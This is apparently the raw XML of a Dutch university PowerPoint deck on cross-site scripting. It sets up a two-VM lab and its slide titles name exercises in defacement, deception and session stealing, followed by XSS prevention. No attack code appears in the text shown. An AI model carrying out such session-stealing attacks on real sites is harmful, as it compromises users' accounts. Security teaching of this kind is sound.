          <p:cNvPr id="30" name="Rechte verbindingslijn met pijl 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2218067" y="3813869"/>
            <a:ext cx="3199061"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11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400" dirty="0" smtClean="0"/>
              <a:t>Introductie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacks</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>testopstelling maken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>1.Onschuldige "spielerei"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>2.Klieren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>3.Klieren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>enhanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>4.Misleiding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>5.Sessie Stelen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS voorkomen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Opdracht</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385310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Test opstelling maken</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testomgeving opzetten/bekijken</a:t>
            </a:r>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832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Maak onderstaande opstelling samen met je partner</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endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Je kunt ook in je eentje werken. Start dan beide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>VM's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> op, op je laptop. Beide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>VMs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> moeten dan op het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>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79505" y="2930695"/>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fbeeldingsresultaat voor office computer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8063" y="2867176"/>
            <a:ext cx="1343314" cy="1324786"/>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1924259" y="4069583"/>
            <a:ext cx="3205424" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Student1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: (W2012)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start WT-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> met </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vbox</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP: 10.0.0.1 (255.0.0.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- kies bridge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> over de </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   fysieke netwerk kaart</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Tekstvak 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7129657" y="4069583"/>
            <a:ext cx="3205424" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Student2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: (W2012)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start WT-server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vbox</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP: 10.0.0.25 (255.0.0.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- kies bridge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> over de </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   fysieke netwerk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kaart</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Vrije vorm 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4170066" y="2994402"/>
            <a:ext cx="3456633" cy="582811"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3456633"/>
              <a:gd name="connsiteY0" fmla="*/ 582811 h 582811"/>
              <a:gd name="connsiteX1" fmla="*/ 1557494 w 3456633"/>
              <a:gd name="connsiteY1" fmla="*/ 7 h 582811"/>
              <a:gd name="connsiteX2" fmla="*/ 3456633 w 3456633"/>
              <a:gd name="connsiteY2" fmla="*/ 572763 h 582811"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3456633" h="582811">
                <a:moveTo>
                  <a:pt x="0" y="582811"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="490694" y="292246"/>
                  <a:pt x="981389" y="1682"/>
                  <a:pt x="1557494" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2133599" y="-1668"/>
                  <a:pt x="2795116" y="285547"/>
                  <a:pt x="3456633" y="572763"/>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146"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5847" y="3451118"/>
            <a:ext cx="565639" cy="3181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erelateerde afbee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3783851" y="3440830"/>
            <a:ext cx="584526" cy="318172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Tekstvak 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248651" y="2600947"/>
            <a:ext cx="1107440" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kabel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237350" y="4226006"/>
            <a:ext cx="1806546" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Kijk of je elkaar kunt pingen</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Tekstvak 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9415305" y="1084170"/>
            <a:ext cx="2535091" cy="646331"/>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hoe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> werkt is al besproken in week1</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2495783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81280" y="1005840"/>
            <a:ext cx="11968480" cy="5770880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="762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3688937" y="1096894"/>
            <a:ext cx="6521863" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>1.Onschuldige "Spielerei"</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Onschuldige Spielerei</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4" name="Tekstvak 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="1991360"/>
            <a:ext cx="11297506" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Open een browser en ga naar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://10.0.0.25/XSS/weblogstart.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>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dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Log in met willekeurige gegevens(geen controle, wel iets </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             invullen a.u.b.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="Gerelateerde afbeel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92814" y="1005840"/>
            <a:ext cx="1383745" cy="1261267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Afbeelding 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688947" y="2588016"/>
            <a:ext cx="3609975" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Tekstvak 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8139166" y="3041524"/>
            <a:ext cx="3569627" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: Neem voor demo doeleinden even aan dat je daadwerkelijk moet inloggen en daarom de velden niet leeg laat.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14810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ICA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ca presentation 16-9" id="{D3287398-E640-8A4A-8181-66D783BF0C61}" vid="{09601997-88CA-0F43-A6C7-6D796F159C1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22EFC5F6A45A42AABBFD279E0D1267" ma:contentTypeVersion="0" ma:contentTypeDescription="Een nieuw document maken." ma:contentTypeScope="" ma:versionID="29c230326bd1bb89b00e7a4f6aa74cec">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E686C2C-14BB-4DBE-9213-EF569AA5F5BB}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{10584E85-B96B-4F03-91D9-12E8ED501A98}">
  <ds:schemaRef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331C5A02-BAA2-4CA0-A60D-0D647F86E4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16858</TotalTime>
  <Words>1492</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breedbeeld</PresentationFormat>
  <Paragraphs>277</Paragraphs>
  <Slides>26</Slides>
  <Notes>24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26</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="31" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Helvetica Neue Light</vt:lpstr>
      <vt:lpstr>ICA 16-9</vt:lpstr>
      <vt:lpstr>Web Technologie</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>Het algemene plaatje </vt:lpstr>
      <vt:lpstr>"Cross Site Scripting (XSS)" attack</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>XSS principe</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>Test opstelling maken</vt:lpstr>
      <vt:lpstr>1.Onschuldige "Spielerei"</vt:lpstr>
      <vt:lpstr>1.Onschuldige "Spielerei"</vt:lpstr>
      <vt:lpstr>1.Onschuldige "Spielerei"</vt:lpstr>
      <vt:lpstr>2.Klieren</vt:lpstr>
      <vt:lpstr>3.Klieren, enhanced</vt:lpstr>
      <vt:lpstr>4.Misleiding</vt:lpstr>
      <vt:lpstr>4.Misleiding</vt:lpstr>
      <vt:lpstr>4.Misleiding</vt:lpstr>
      <vt:lpstr>5.Sessie Stelen</vt:lpstr>
      <vt:lpstr>5.Sessie Stelen</vt:lpstr>
      <vt:lpstr>5.Sessie Stelen</vt:lpstr>
      <vt:lpstr>5.Sessie Stelen</vt:lpstr>
      <vt:lpstr>5.Sessie Stelen</vt:lpstr>
      <vt:lpstr>5.Sessie Stelen</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>XSS injection voorkomen</vt:lpstr>
      <vt:lpstr>Opdracht: voorkom XSS</vt:lpstr>
      <vt:lpstr>Nawoord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Hendrik Postma</dc:creator>
  <cp:lastModifiedBy>karl de heer</cp:lastModifiedBy>
  <cp:revision>305</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-24T10:12:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-26T09:16:05Z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0x0101007D22EFC5F6A45A42AABBFD279E0D1267</vt:lpwstr>
  </property>
</Properties>
</file>